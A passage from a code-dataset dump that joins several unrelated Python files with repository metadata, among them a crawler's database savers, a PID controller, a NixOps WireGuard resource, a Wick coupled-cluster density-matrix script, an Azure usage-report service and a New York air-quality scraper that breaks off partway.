db_manager.handel_exception(e, True, 'save_site', site.domain)
return True
def save_link_to_db(link):
try:
db_manager.session.add(link)
db_manager.session.commit()
except exc.SQLAlchemyError as e:
db_manager.handel_exception(e, True, 'save_link', link.to_page)
return True
def save_image_to_db(image):
try:
db_manager.session.add(image)
db_manager.session.commit()
except exc.SQLAlchemyError as e:
db_manager.handel_exception(e, True, 'save_image', image.url)
return True
def save_page_image_to_db(page_image):
try:
db_manager.session.add(page_image)
db_manager.session.commit()
except exc.SQLAlchemyError as e:
db_manager.handel_exception(e, True, 'save_page_image', page_image.image_id)
return True
def save_page_data_to_db(page_data):
try:
db_manager.session.add(page_data)
db_manager.session.commit()
except exc.SQLAlchemyError as e:
db_manager.handel_exception(e, True, 'save_page_data', page_data.page_id)
return True
### saving documents
def save_documents_to_db(doc_array, page_id):
for doc in doc_array:
save_document_to_db(doc, page_id)
return True
def save_document_to_db(url, page_id):
return True
### saving images
def save_images_to_db(img_array, page_id):
for img in img_array:
save_document_to_db(img, page_id)
return True
| lavrinec/GOV-Crawler | crawler/src/savers.py | savers.py | py | 1,893 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "src.db_manager.session.add",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "src.db_manager.session",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "src.db_manager",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "sr... |
36224024372 | from pathlib import Path
import shelve
class PID():
P = Path('C:\\','Users','leouh', 'Documents', 'Rb_Controller')
def __init__(self):
with shelve.open('config') as config:
self.cfg = dict(config)
self.Ts = 1/self.cfg['freq']
if self.cfg['ki']:
self.taui = self.cfg['kp']/self.cfg['ki']
self.taud = self.cfg['kd']/self.cfg['kp']
integral_error = 0
integral_error2 = 0
prev_t = 0
prev_t2 = 0
upper_lim = 28
lower_lim = 0
settlecount = 0
active_controller = 1
def settle_update(self, t, t_target,error,slope):
within_error = error and self.cfg['max_fluctuations'] > abs(t_target - t)
within_slope = slope and self.cfg['settle_slope'] >= abs(t - self.prev_t) / self.Ts
if within_error or within_slope:
self.settlecount += 1
else:
self.settlecount = 0
def settle_check(self,slope,timed):
if slope and timed:
res = self.settlecount > self.cfg['settle_wait_time']*self.cfg['freq'] or \
self.settlecount > self.cfg['slope_length']*self.cfg['freq']
elif slope:
res = self.settlecount > self.cfg['slope_length']*self.cfg['freq']
elif timed:
res = self.settlecount > self.cfg['settle_wait_time']*self.cfg['freq']
else:
res = False
return res
def swap_controller(self,to):
if to == self.active_controller:
return
if to == 1:
self.integral_error = self.integral_error2*self.cfg['ki2']/self.cfg['ki']
if to == 2:
self.integral_error2 = self.integral_error*self.cfg['ki']/self.cfg['ki2']
self.active_controller = to
# Simple PID controller. Explicitly dealing with wind-up
def update(self, t, t_target):
error = t_target - t
p = self.cfg['kp'] * error
i = self.cfg['ki'] * self.integral_error * self.Ts
derivative = t - self.prev_t
d = self.cfg['kd'] * derivative / self.Ts
self.prev_t = t
pidout = p + i + d
if self.lower_lim < pidout < self.upper_lim:
self.integral_error += error
else:
self.integral_error = 0
return max(min(pidout,self.upper_lim),self.lower_lim)
def update2(self, t, t_target):
error = t_target - t
p = self.cfg['kp2'] * error
i = self.cfg['ki2'] * self.integral_error2 * self.Ts
derivative = t - self.prev_t2
d = self.cfg['kd2'] * derivative / self.Ts
self.prev_t2 = t
pidout = p + i + d
if self.lower_lim < pidout < self.upper_lim:
self.integral_error2 += error
else:
self.integral_error2 = 0
return max(min(pidout,self.upper_lim),self.lower_lim) | leouhre/Rb_Controller | classes/pid.py | pid.py | py | 2,831 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "pathlib.Path",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "shelve.open",
"line_number": 7,
"usage_type": "call"
}
] |
75162791714 | # -*- coding: utf-8 -*-
# Automatic provisioning of wireguard keypair resources.
import nixops.util
import nixops.resources
import logging
from typing import Mapping, Optional, Sequence
logger = logging.getLogger(__name__)
class WgKeypairOptions(nixops.resources.ResourceOptions):
"""Definition of wireguard keypair options."""
name: str
enable: bool
dns: Sequence[str]
mtu: Optional[int]
listenPort: int
persistentKeepalive: Optional[int]
usePresharedKey: bool
syncState: bool
interfaceName: str
table: Optional[str]
preUp: str
preDown: str
postUp: str
postDown: str
baseIpv4: Mapping[str, int]
addNoWgHosts: bool
class WgKeypairDefinition(nixops.resources.ResourceDefinition):
"""Definition of a wireguard keypair resource."""
config: WgKeypairOptions
@classmethod
def get_type(cls) -> str:
return "wg-keypair"
@classmethod
def get_resource_type(cls) -> str:
return "wgKeypair"
def __init__(self, name: str, config: nixops.resources.ResourceEval):
super().__init__(name, config)
self.kp_name: str = self.config.name
self.enable: bool = self.config.enable
self.dns: Sequence[str] = self.config.dns
self.mtu: Optional[int] = self.config.mtu
self.listen_port: int = self.config.listenPort
self.keepalive: Optional[int] = self.config.persistentKeepalive
self.use_psk: bool = self.config.usePresharedKey
self.sync_state: bool = self.config.syncState
self.interface_name: str = self.config.interfaceName
self.table: Optional[str] = self.config.table
self.pre_up: str = self.config.preUp
self.pre_down: str = self.config.preDown
self.post_up: str = self.config.postUp
self.post_down: str = self.config.postDown
self.base_ipv4: Mapping[str, int] = self.config.baseIpv4
self.add_no_wg_hosts: bool = self.config.addNoWgHosts
class WgKeypairState(nixops.resources.ResourceState[WgKeypairDefinition]):
"""State of a wireguard keypair resource."""
kp_name: str = nixops.util.attr_property("wgKeypair.name", None, str)
enable: bool = nixops.util.attr_property("wgKeypair.enable", False, bool)
dns: Sequence[str] = nixops.util.attr_property("wgKeypair.dns", [], "json")
mtu: Optional[int] = nixops.util.attr_property("wgKeypair.mtu", None, int)
addr: str = nixops.util.attr_property("wgKeypair.addr", None, str)
private: str = nixops.util.attr_property("wgKeypair.private", None, str)
public: str = nixops.util.attr_property("wgKeypair.public", None, str)
listen_port: int = nixops.util.attr_property("wgKeypair.listenPort", None, int)
keepalive: Optional[int] = nixops.util.attr_property(
"wgKeypair.keepalive", None, int
)
use_psk: bool = nixops.util.attr_property("wgKeypair.usePresharedKey", True, bool)
psk: str = nixops.util.attr_property("wgKeypair.presharedKey", None, str)
sync_state: bool = nixops.util.attr_property("wgKeypair.syncState", False, bool)
interface_name: str = nixops.util.attr_property(
"wgKeypair.interfaceName", None, str
)
table: Optional[str] = nixops.util.attr_property("wgKeypair.table", None, str)
pre_up: str = nixops.util.attr_property("wgKeypair.preUp", "", str)
pre_down: str = nixops.util.attr_property("wgKeypair.preDown", "", str)
post_up: str = nixops.util.attr_property("wgKeypair.postUp", "", str)
post_down: str = nixops.util.attr_property("wgKeypair.postDown", "", str)
base_ipv4: Mapping[str, int] = nixops.util.attr_property(
"wgKeypair.baseIpv4", {}, "json"
)
add_no_wg_hosts: bool = nixops.util.attr_property(
"wgKeypair.addNoWgHosts", True, bool
)
@classmethod
def get_type(cls) -> str:
return "wg-keypair"
def __init__(self, depl: nixops.deployment.Deployment, name: str, id):
nixops.resources.ResourceState.__init__(self, depl, name, id)
@property
def resource_id(self) -> str:
return self.kp_name
def get_definition_prefix(self) -> str:
return "resources.wgKeypair."
def create(
self,
defn: WgKeypairDefinition,
check: bool,
allow_reboot: bool,
allow_recreate: bool,
) -> None:
self.kp_name = f"nixops-{self.depl.uuid}-{defn.name}"
self.enable = defn.enable
self.dns = defn.dns
self.mtu = defn.mtu
self.listen_port = defn.listen_port
self.keepalive = defn.keepalive
self.use_psk = defn.use_psk
self.sync_state = defn.sync_state
self.interface_name = defn.interface_name
self.table = defn.table
self.pre_up = defn.pre_up
self.pre_down = defn.pre_down
self.post_up = defn.post_up
self.post_down = defn.post_down
self.base_ipv4 = defn.base_ipv4
self.add_no_wg_hosts = defn.add_no_wg_hosts
self.state = self.UP
def destroy(self, wipe: bool = False) -> bool:
if not self.depl.logger.confirm(
f"are you sure you want to destroy wireguard keypair resource (wg-link) ‘{self.name}’?"
):
return False
if wipe:
self.warn("wipe is not supported")
self.log(f"destroying {self.name} (resource id: {self.kp_name})...")
return True
| input-output-hk/nixops-wg-links | nixops_wg_links/resources/wg_keypair.py | wg_keypair.py | py | 5,381 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "logging.getLogger",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "nixops.util.resources",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "nixops.util",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "typing.Seque... |
70173697953 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import argparse, codecs, sys
# Parseur de ligne de commande
parser = argparse.ArgumentParser(description="Sorts or inverts lines or characters from a file.")
parser.add_argument('-f', help="input file")
# seul -l ou -c est permis
lorc = parser.add_mutually_exclusive_group()
lorc.add_argument('-l', help='line sort (default)', action='store_true')
lorc.add_argument('-c', help='character sort', action='store_true')
parser.add_argument('mode', help='either "sort" or "invert"')
args = parser.parse_args()
# Lecture du fichier
lines = []
try:
with codecs.open(args.f, 'r', encoding='utf8') as f:
for line in f.readlines():
# on élimine les retours à la ligne en vue de l'éventuel tri
lines.append(line.rstrip('\n'))
except IOError:
sys.exit('Error: file not found')
# Opérations sur le texte
# (si le paramètre -c est spécificié, chaque ligne est aussi
# triée ou inversée; le paramètre -l n'est jamais vérifié,
# mais l'utilisateur peut l'utiliser pour se "rassurer")
if args.mode == 'sort':
# tri selon l'ordre de Python
if args.c:
for i in range(0, len(lines)):
lines[i] = ''.join(sorted(lines[i]))
lines.sort()
elif args.mode == 'invert':
# inversion
# (c'est peu efficace de procéder à l'inversion explicitement,
# mais c'est plus clair, et 'sort' est bien pire de toute façon!)
if args.c:
for i in range(0, len(lines)):
lines[i] = lines[i][::-1]
lines.reverse()
else:
# si un mode erroné est spécifié, les lignes ne sont pas modifiées
sys.exit("Error: unrecognized mode (must be either 'sort' or 'invert')")
# Impression
for line in lines:
sys.stdout.write(line+'\n') | ndaoust/Z | scramble.py | scramble.py | py | 1,693 | python | fr | code | 0 | github-code | 1 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "codecs.open",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "sys.exit",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "sys.exit",
"line_numb... |
4516929724 | # Проанализировать зарплаты КМДА csv файлы за 2019 год найти средние минимальные максимальные построить график
import matplotlib.pyplot as plt
def get_data(filename):
with open(filename, 'r', encoding='utf8') as file:
data = {}
file.readline()
for row in file:
row_array = row.rstrip().split(';')
data[row_array[0]] = float(row_array[9].replace('₴', '').replace(' ', '').replace(',', '.'))
return data
def draw_diagram(data):
left_edges = [0, 10, 20, 30, 40, 50, 60, 70, 80]
bar_width = 10
plt.bar(left_edges, data.values(), bar_width, color=('r', 'g', 'b', 'm', 'k'))
plt.xlabel('Сотрудник')
plt.ylabel('Зарплата')
plt.xticks([0, 10, 20, 30, 40, 50, 60, 70, 80], data.keys())
plt.xticks(rotation=90)
#
plt.yticks([0, 5000, 10000, 15000, 20000, 25000, 30000, 35000, 40000, 45000])
plt.subplots_adjust(bottom=0.4)
plt.show()
if __name__ == '__main__':
data = get_data('berezen-2019.csv')
salaries = data.values()
max_salary = max(salaries)
min_salary = min(salaries)
average_salary = round(sum(salaries) / len(salaries), 2)
print(max_salary, min_salary, average_salary)
draw_diagram(data)
| su1gen/python-homework | lesson05HW/kmda/__main__.py | __main__.py | py | 1,344 | python | ru | code | 0 | github-code | 1 | [
{
"api_name": "matplotlib.pyplot.bar",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.xlabel",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "matp... |
30375203012 | from fractions import Fraction
from wick.index import Idx
from wick.operator import FOperator, Tensor
from wick.expression import Term, Expression, AExpression
from wick.wick import apply_wick
from wick.convenience import E1, E2, commute
i = Idx(0, "occ")
a = Idx(0, "vir")
j = Idx(1, "occ")
b = Idx(1, "vir")
T1 = E1("t", ["occ"], ["vir"])
T2 = E2("t", ["occ"], ["vir"])
T = T1 + T2
L1 = E1("L", ["vir"], ["occ"])
L2 = E2("L", ["vir"], ["occ"])
L = L1 + L2
# ov block
operators = [FOperator(a, True), FOperator(i, False)]
pvo = Expression([Term(1, [], [Tensor([i, a], "")], operators, [])])
PT = commute(pvo, T)
PTT = commute(PT, T)
mid = pvo + PT + Fraction('1/2')*PTT
full = L*mid
out = apply_wick(full)
out.resolve()
final = AExpression(Ex=out)
print("P_{ov} = ")
print(final)
# vv block
operators = [FOperator(a, True), FOperator(b, False)]
pvv = Expression([Term(1, [], [Tensor([b, a], "")], operators, [])])
PT = commute(pvv, T)
PTT = commute(PT, T)
mid = pvv + PT + Fraction('1/2')*PTT
full = L*mid
out = apply_wick(full)
out.resolve()
final = AExpression(Ex=out)
final.sort_tensors()
print("P_{vv} = ")
print(final)
# oo block
operators = [FOperator(j, False), FOperator(i, True)]
poo = Expression([Term(-1, [], [Tensor([j, i], "")], operators, [])])
PT = commute(poo, T)
PTT = commute(PT, T)
mid = poo + PT + Fraction('1/2')*PTT
full = L*mid
out = apply_wick(full)
out.resolve()
final = AExpression(Ex=out)
final.sort_tensors()
print("P_{oo} = ")
print(final)
# vo block
operators = [FOperator(i, True), FOperator(a, False)]
pvo = Expression([Term(1, [], [Tensor([a, i], "")], operators, [])])
PT = commute(pvo, T)
PTT = commute(PT, T)
mid = pvo + PT + Fraction('1/2')*PTT
full = mid + L*mid
out = apply_wick(full)
out.resolve()
final = AExpression(Ex=out)
final.sort_tensors()
print("P_{vo} = ")
print(final)
| awhite862/wick | examples/ccsd_1rdm.py | ccsd_1rdm.py | py | 1,831 | python | en | code | 14 | github-code | 1 | [
{
"api_name": "wick.index.Idx",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "wick.index.Idx",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "wick.index.Idx",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "wick.index.Idx",
"line... |
39998982074 | import unittest
import shutil
import tempfile
import os
import logging
logging.getLogger().setLevel(logging.ERROR)
import heppy.framework.context as context
if context.name != 'bare':
from simple_example_noindexing_cfg import config
from heppy.utils.debug_tree import create_tree, remove_tree
from heppy.framework.looper import Looper
from ROOT import TFile
@unittest.skipIf(context.name=='bare', 'ROOT not available')
class TestNoIndexing(unittest.TestCase):
def setUp(self):
self.fname = create_tree()
rootfile = TFile(self.fname)
self.nevents = rootfile.Get('test_tree').GetEntries()
self.outdir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.outdir)
def test_all_events_processed(self):
loop = Looper( self.outdir, config,
nEvents=None,
nPrint=0 )
loop.loop()
loop.write()
logfile = open('/'.join([self.outdir, 'log.txt']))
nev_processed = None
for line in logfile:
if line.startswith('number of events processed:'):
nev_processed = int(line.split(':')[1])
logfile.close()
self.assertEqual(nev_processed, self.nevents)
# checking the looper itself.
self.assertEqual(loop.nEvProcessed, self.nevents)
def test_skip(self):
first = 10
loop = Looper( self.outdir, config,
nEvents=None,
firstEvent=first,
nPrint=0 )
loop.loop()
loop.write()
# input file has 200 entries
# we skip 10 entries, so we process 190.
self.assertEqual(loop.nEvProcessed, self.nevents-first)
def test_process_event(self):
'''Test that indeed, calling loop.process(iev) raises
TypeError if the events backend does not support indexing.
'''
loop = Looper( self.outdir, config,
nEvents=None,
nPrint=0 )
self.assertRaises(TypeError, loop.process, 10)
if __name__ == '__main__':
unittest.main()
| cbernet/heppy | heppy/test/test_noindexing.py | test_noindexing.py | py | 2,161 | python | en | code | 9 | github-code | 1 | [
{
"api_name": "logging.getLogger",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "logging.ERROR",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "heppy.framework.context.name",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "h... |
28840367023 | # this class is meant to create a menu floater that moves across the screen vertically and in random positions
#importing librairies
import copy
import random
import pygame
import TestTubeGame
class Menu_Floater:
def __init__(self,img, direction):
self.image = img
self.current_image = copy.copy(self.image)
self.direction = direction
self.angle = 0
self.s = 1
self.sp = 1
self.reset()
#Method that chooses a random x value and sets the image to it
def reset(self):
self.x = random.randint(0, TestTubeGame.WIDTH - self.current_image.get_width())
self.angle = 0
self.s = random.randint(0,5)
self.sp = random.randint(1,15)
self.current_image = pygame.transform.scale(self.image, (random.randint(int(TestTubeGame.WIDTH // 40), int(
TestTubeGame.WIDTH // 20)), random.randint(int(TestTubeGame.HEIGHT // 40), int(TestTubeGame.HEIGHT // 20))))
if self.direction:
self.y = TestTubeGame.HEIGHT
else:
self.y = 0 - self.current_image.get_height()
# Method that moves the image vertically
def move(self):
if self.direction:
self.y -= self.sp
else:
self.y += self.sp
#Method that spins the object
def spin(self):
rotated_image = pygame.transform.rotate(self.current_image, self.angle)
self.angle += self.s
return rotated_image
#Method that draw the object
def draw(self):
TestTubeGame.WINDOW.blit(self.spin(), (self.x, self.y))
self.move()
self.overpass()
# Method that checks for overpass
def overpass(self):
if self.x > TestTubeGame.WIDTH or self.x < 0 or self.y < 0 - self.current_image.get_height() or self.y > TestTubeGame.HEIGHT:
self.reset()
| MiracleSheep/Python_Pygame_TestTubeGame | menu_floater.py | menu_floater.py | py | 1,851 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "copy.copy",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "TestTubeGame.WIDTH",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_name": "random.randint",
... |
30209496323 | # LMGP Visualization
#
#
#
import numpy as np
import matplotlib.pyplot as plt
import torch
def plot_ls(model, constraints_flag = True):
#
# plot latent values
zeta = torch.tensor(model.zeta, dtype = torch.float64)
#A = model.nn_model.weight.detach()
perm = model.perm
levels = model.num_levels_per_var
#positions = torch.matmul(zeta, A.T) # this gives the position of each combination in latent space
positions = model.nn_model(zeta, transform = lambda x: x) #3-torch.exp(x)
if positions.ndim > 2:
positions = positions.mean(axis = 0)
else:
positions = positions.detach()
if positions.ndim > 2:
positions = positions.mean(axis = 0)
# applying the constrains
if constraints_flag:
positions = constrains(positions)
positions = positions.detach().numpy()
# plt.rcParams.update({'font.size': 19})
# fig,axs = plt.subplots(figsize=(8.5,6))
# colors = {0:'blue', 1:'r', 2:'g', 3:'c', 4:'m', 5:'k', 6:'y'}
# # loop over the number of variables
# for j in range(len(levels)):
# for i in range(levels[j]):
# index = torch.where(perm[:,j] == i)
# col = list(map(lambda x: colors[x], np.ones(index[0].numpy().shape) * i))
# axs.scatter(positions[index][...,0], positions[index][...,1], label = 'level' + str(i+1), c = col)
# #axs.set_title('Variable ' + str(j), fontsize = 15)
# axs.set_xlabel(r'$z_1$', fontsize = 25)
# axs.set_ylabel(r'$z_2$', fontsize = 25)
# axs.legend()
# tempxi = np.min(positions[...,0])-0.2 * (np.abs(np.min(positions[...,0])) +5)
# tempxx = np.max(positions[...,0]) + 0.2 * (np.abs(np.max(positions[...,0])) +5)
# tempyi = np.min(positions[...,1])-0.2 * (np.abs(np.min(positions[...,1])) +5)
# tempyx = np.max(positions[...,1]) + 0.2 * (np.abs(np.max(positions[...,1])) +5)
# axs.set_xlim(tempxi, tempxx)
# axs.set_ylim(tempyi, tempyx)
# #fig.tight_layout()
# #plt.tight_layout()
# #plt.autoscale()
return positions
def constrains(z):
n = z.shape[0]
z = z - z[0,:]
if z[1,0] < 0:
z[:, 0] *= -1
rot = torch.atan(-1 * z[1,1]/z[1,0])
R = torch.tensor([ [torch.cos(rot), -1 * torch.sin(rot)], [torch.sin(rot), torch.cos(rot)]])
z = torch.matmul(R, z.T)
z = z.T
if z.shape[1] > 2 and z[2,1] < 0:
z[:, 1] *= -1
return z
| yiping514/LMGP | lmgp_pytorch/visual/plot_latenth_position.py | plot_latenth_position.py | py | 2,515 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "torch.tensor",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "torch.float64",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "torch.atan",
"line_number": 70,
"usage_type": "call"
},
{
"api_name": "torch.tensor",
"line_n... |
4566035845 | from datetime import datetime, timedelta
import pandas as pd
from framework.configuration.configuration import Configuration
from framework.logger.providers import get_logger
from clients.azure_gateway_client import AzureGatewayClient
from clients.email_gateway_client import EmailGatewayClient
from domain.usage import ReportDateRange
from services.event_service import EventService
logger = get_logger(__name__)
def element_at(_list, index):
try:
return _list[index]
except:
return None
REPORT_EMAIL_SUBJECT = 'Azure Usage'
REPORT_SORT_KEY = 'Cost'
REPORT_COLUMNS = [
'Cost',
'CostUSD',
'Currency',
'Product'
]
REPORT_GROUP_KEYS = [
'Product',
'Currency'
]
class UsageService:
def __init__(
self,
configuration: Configuration,
email_client: EmailGatewayClient,
azure_client: AzureGatewayClient,
event_service: EventService
):
self.__email_client = email_client
self.__azure_client = azure_client
self.__event_service = event_service
self.__recipient = configuration.azure_usage.get('recipient')
def __format_date(self, date):
return date.strftime('%Y-%m-%d')
async def send_cost_management_report(
self,
range_key: str
) -> dict:
logger.info(f'Generating usage report')
start_date, end_date = self.__get_date_range(
range_key=range_key)
logger.info(f'Range: {start_date} to {end_date}')
content = await self.__azure_client.get_cost_management_data(
start_date=start_date,
end_date=end_date)
data = content.get('data')
df = pd.DataFrame(data)[REPORT_COLUMNS]
df = (df
.groupby(
by=REPORT_GROUP_KEYS,
as_index=False)
.sum())
df = df.sort_values(
by=REPORT_SORT_KEY,
ascending=False)
table = df.to_dict(
orient='records')
logger.info('Sending datatable email gateway request')
event_request, endpoint = self.__email_client.get_datatable_email_request(
recipient=self.__recipient,
subject=f'{REPORT_EMAIL_SUBJECT}: {range_key}',
data=table)
await self.__event_service.dispatch_email_event(
endpoint=endpoint,
message=event_request.to_dict())
return {'table': table}
def __get_date_range(
self,
range_key: str
):
logger.info(f"Parsing range for date range type: '{range_key}'")
now = datetime.utcnow()
if range_key is None:
logger.info(f'Returning default report date range')
return (
self.__format_date(now),
self.__format_date(now)
)
if range_key.startswith(ReportDateRange.LastNDays):
days = element_at(range_key.split('_'), 1)
if days is None:
raise Exception("Range key must be in the format 'days_n'")
if not days.isdigit():
raise Exception("Range day parameter is not of type 'int'")
return (
self.__format_date(now - timedelta(days=int(days))),
self.__format_date(now)
)
if range_key == ReportDateRange.MonthToDate:
start = datetime(
year=now.year,
month=now.month,
day=1)
return (
self.__format_date(start),
self.__format_date(now)
)
if range_key == ReportDateRange.YearToDate:
start = datetime(
year=now.year,
month=1,
day=1)
return (
self.__format_date(start),
self.__format_date(now)
)
raise Exception(f"'{range_key}' is not a valid report date range key")
| danleonard-nj/kube-tools-api | services/kube-tools/services/usage_service.py | usage_service.py | py | 3,969 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "framework.logger.providers.get_logger",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "framework.configuration.configuration.Configuration",
"line_number": 40,
"usage_type": "name"
},
{
"api_name": "clients.email_gateway_client.EmailGatewayClient",
"... |
21448529472 | import datetime as dt
from dateutil import parser
import os
import pandas as pd
import numpy as np
from scipy import interpolate
from matplotlib import mlab
from selenium import webdriver
import bs4
from timeout import timeout
class DECStation:
def __init__(self, number, name, lon, lat):
self.number = number
self.name = name
self.lon = lon
self.lat = lat
def get_station_url(self):
""" Get url for a particular station"""
url = 'http://www.nyaqinow.net/StationReportFast.aspx?&ST_ID=%s' %self.number
return url
def get_stations():
"""Get the stations"""
all_stations = {
#DEC group 1
#Long Island
'Babylon': DECStation(46, 'Babylon', -73.41919, 40.74529),
'Eisenhower Park': DECStation(53, 'Eisenhower Park', -73.58549, 40.74316),
'Suffolk County': DECStation(36, 'Suffolk County', -73.05754, 40.82799),
#DEC group 2
#Manhattan
'CCNY': DECStation(73, 'CCNY', -73.94825, 40.81976),
'IS 143': DECStation(56, 'IS 143', -73.93059, 40.84888),
'PS 19': DECStation(75, 'PS 19', -73.98446, 40.73000),
'Division Street': DECStation(60, 'Division Street', -73.99518, 40.71436),
#Staten Island
'Fresh Kills West': DECStation(61, 'Fresh Kills West', -74.19832, 40.58027),
'Port Richmond': DECStation(80, 'Port Richmond', -74.13719, 40.63307),
'Susan Wagner': DECStation(49, 'Susan Wagner', -74.12525, 40.59664),
#Bronx
'IS 52': DECStation(24, 'IS 52', -73.9020, 40.8162),
'IS 74': DECStation(8, 'IS 74', -73.88553, 40.81551),
'NYBG': DECStation(57, 'NYBG', -73.87809, 40.86790),
#Queens
'Maspeth': DECStation(13, 'Maspeth', -73.89313, 40.72698),
'Queens College': DECStation(62, 'Queens College', -73.82153, 40.73614),
#Brooklyn
'PS 274': DECStation(6, 'PS 274', -73.92769, 40.69454),
'PS 314': DECStation(10, 'PS 314', -74.01871, 40.64182),
#DEC group 3
#North
'White Plains': DECStation(34, 'White Plains', -73.76366, 41.05192),
'Millbrook': DECStation(25, 'Millbrook', -73.74136, 41.78555)
}
return all_stations
def parse_to_float(x):
try:
return float(x)
except:
return np.nan
def get_station_raw_data(stations, start_date, end_date):
"""
Download the station data from airnow website
"""
# Defaults
website_cols = ['Date Time', 'O3', 'PM25C', 'SO2', 'CO']
polished_names = ['Date Time', 'station', 'lon', 'lat', 'PM25', 'O3', 'SO2', 'CO']
# Load into one dataframe
all_data = pd.DataFrame()
chrome_bin = os.environ.get('GOOGLE_CHROME_SHIM')
if chrome_bin:
options = webdriver.ChromeOptions()
options.binary_location = chrome_bin
driver = webdriver.Chrome(chrome_options = options)
else:
driver = webdriver.Chrome()
for name, station in stations.items():
# Navigate to the webpage
url = station.get_station_url()
driver.get(url)
driver.find_element_by_id('btnGenerateReport').click()
# Scrape the content
content = driver.page_source
soup = bs4.BeautifulSoup(content)
table = soup.find(attrs={'id': 'C1WebGrid1'})
df = pd.read_html(str(table), header=0, flavor='bs4')[0]
# Keep columns and parse
cols_keep = list(set(df.columns).intersection(set(website_cols)))
df = df[cols_keep]
df['Date Time'] = df['Date Time'].map(pd.to_datetime)
col_nulls = {}
for col in df.columns:
if col != 'Date Time':
df[col] = df[col].map(parse_to_float)
col_nulls[col] = pd.isnull(df[col])
df_nulls = pd.DataFrame(col_nulls)
all_nulls = df_nulls.apply(min, axis = 1)
# Filter out bad dates and NaNs
df_filtered = df[-(all_nulls | pd.isnull(df['Date Time']))]
# Add missing columns
cols_add = set(website_cols) - set(df_filtered.columns)
for col in cols_add:
df_filtered[col] = np.nan
df_filtered['station'] = name
df_filtered['lon'] = station.lon
df_filtered['lat'] = station.lat
df_filtered.rename(columns = {'PM25C': 'PM25'}, inplace = True)
all_data = all_data.append(df_filtered, ignore_index=True)
driver.quit()
return all_data
def calculate_stations_aqi_data(station_data, breakpoints, aq_variables):
"""
24 hours for PM2.5, 1 hours for O3
"""
station_grouped = station_data.groupby(['station', 'lon', 'lat'])
stations_PM25_24hr = station_grouped.agg({'PM25':
lambda x: np.mean(x.tail(1))})
stations_O3_1hr = station_grouped.agg({'O3':
lambda x: np.mean(x.tail(1)) * 1000}) # x 1000 to get to ppb
stations_O3_8hr = station_grouped.agg({'O3':
lambda x: np.mean(x.tail(8)) * 1000}) # x 1000 to get to ppb
stations_PM25_24hr.columns = ['PM25_24hr']
stations_O3_1hr.columns = ['O3_1hr']
stations_O3_8hr.columns = ['O3_8hr']
stations_out = stations_PM25_24hr.join(stations_O3_1hr).join(stations_O3_8hr)
stations_out['AQI'] = stations_out.apply(lambda x: calculate_aqi(x, breakpoints), axis=1)
stations_out.reset_index(level=[0,1,2], inplace=True)
stations_out = stations_out[['station', 'lon', 'lat', 'PM25_24hr', 'O3_8hr', 'AQI']]
stations_out.columns = ['station', 'lon', 'lat', 'PM25', 'O3', 'AQI']
stations_out = pd.melt(stations_out, id_vars=['station', 'lon', 'lat'], value_vars=aq_variables)
stations_out = stations_out.dropna()
return stations_out
def calculate_aqi(station_obs, breakpoints):
"""
Given a station's cross-sectional data, calculate AQI
"""
aqi = 0
for name, value in station_obs.iteritems():
aqi = max(aqi, calculate_score(value, breakpoints, name))
return aqi
def calculate_score(value, breakpoints, name):
"""
Return the score for a scale
"""
if np.isnan(value):
return 0
if value < 0:
value = 0
ndx = breakpoints[breakpoints[name] > value].index[0]
if ndx == 0:
return 0
index_l = breakpoints.ix[ndx - 1, 'Index']
index_h = breakpoints.ix[ndx, 'Index']
conc_l = breakpoints.ix[ndx - 1, name]
conc_h = breakpoints.ix[ndx, name]
out = (float(index_h - index_l) / float(conc_h - conc_l)) * \
float(value - conc_l) + index_l
return 0 if np.isnan(out) else out
def get_interpolated_grid_data(station_data, aq_variables, data_dir = '/app/static/'):
"""
Given a melted dataframe of cross-sectional station data
(pertaining to one time stamp), output the corresponding grid data
"""
locs_file = os.path.join(data_dir, 'grid_locs.csv')
locs = pd.read_csv(locs_file)
lon_locs = np.unique(locs['c_lon'].values)
lat_locs = np.unique(locs['c_lat'].values)
locs_data = locs[['gr_id']]
# For each air quality variable, interpolate across the grid given available stations
for aq_v in aq_variables:
station_data_aqv = station_data[station_data['variable'] == aq_v]
#
# Find nearest station
#
nearest_station = interpolate.griddata((station_data_aqv['lon'].values, station_data_aqv['lat'].values),
station_data_aqv['station'].values,
(locs['c_lon'].values, locs['c_lat'].values), method='nearest')
nearest_station_df = pd.DataFrame({'gr_id': locs['gr_id'].values,
'station': nearest_station,
'c_lon': locs['c_lon'].values, 'c_lat': locs['c_lat'].values})
nearest_station_df = pd.merge(nearest_station_df, station_data_aqv, on='station')
#
# Interpolate using Delaunay triangulation, filling the holes with nearest neighbor
#
# lon x lat - melted lons change first
